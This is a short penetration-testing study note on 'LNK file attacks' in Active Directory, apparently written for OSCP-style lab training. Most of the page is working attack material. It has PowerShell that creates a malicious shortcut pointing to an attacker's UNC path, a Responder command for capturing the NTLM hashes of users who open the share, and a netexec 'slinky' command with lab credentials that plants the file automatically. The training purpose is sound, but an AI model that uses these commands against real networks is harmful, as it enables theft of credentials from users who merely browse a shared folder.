// notes/ Active Directory
🏛️
Post Compromise Attacks Lnk File Attacks
A LNK File Attack is a type of [watering hole attack](https://www.techtarget.com/searchsecurity/definition/watering-hole-attack) that is done by creating a malicious file that poi…
#active directory#adot8
source · oscp.adot8.com · active-directory/post-compromise-attacks_lnk-file-attacks ↗LNK File Attacks
A LNK File Attack is a type of watering hole attack that is done by creating a malicious file that points back to us, placing it inside of shared folder and then waiting for hashes to fly into Responder.
Manual Attack Setup
Inside of an elevated PowerShell shell create the malicious file
powershell
$$objShell = New-Object -ComObject WScript.shell$$lnk = $objShell.CreateShortcut("C:\evil.lnk")$$lnk.TargetPath = "\\<YOUR-IP>\@evil.png"$$lnk.WindowStyle = 1$$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"$$lnk.Description = "evil"$$lnk.HotKey = "Ctrl+Alt+T"$$lnk.Save()Save the file with an @ symbol at beginning of the name so it loads at the top of the share
Run Responder
bash
$sudo responder -I eth0 -dwvAutomated Attack via Netexec
bash
$netexec smb 192.168.138.132 -d pnpt.local -u greg -p Password1 -M slinky -o NAME=evil SERVER=192.168.138.149